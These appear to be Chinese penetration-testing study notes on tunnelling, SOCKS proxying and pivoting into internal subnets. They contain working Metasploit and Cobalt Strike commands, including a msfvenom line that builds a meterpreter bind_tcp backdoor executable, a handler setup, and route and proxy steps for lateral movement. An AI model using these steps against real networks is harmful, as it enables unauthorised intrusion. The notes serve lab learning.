-隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网)
-代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)
-连接方向:正向&反向
代理协议: SOCKS4/5
代理软件: SocksCap Proxifier ProxyChains(linux) 等
reverse是反射 代表反向
bind是本地 代表正向
正向:
使用绑定模式生成后门
将脚本上传对方主机,运行
cs会话主动连接对方网络
ne'wai'na'g
不属于同一个网端,网卡不在一起通讯不了
MSF 通讯
1、添加路由 限于 MSF (只添加到了msf控制端)
查看路由信息
run autoroute -p
run post/multi/manage/autoroute
添加指定路由,1 是接收的 session 编号
route add 192.168.11.0 255.255.255.0 1
2、Sock 代理 全局同用
use auxiliary/server/socks_proxy
set srvhost 0.0.0.0
set srvport 1115
run
启用代理软件配置 Sock5 代理
CS 通讯
命令:socks 59578
操作:代理转发-Socks 代理
MSF 控制上线-正向连接
msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=3333 -f exe > bd.exe
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.11.129
set lport 3333
run
CS 控制上线-正向连接
监听器:bind_tcp port
命令:connect ip port
cs建立代理节点
建立一个端口
代理配置端口
设置代理规则,就可以通讯了
使用绑定模式生成后门
将脚本上传对方主机,运行
cs会话主动连接对方网络
msf通讯:
添加路由
加载代理
后续生成后门 运行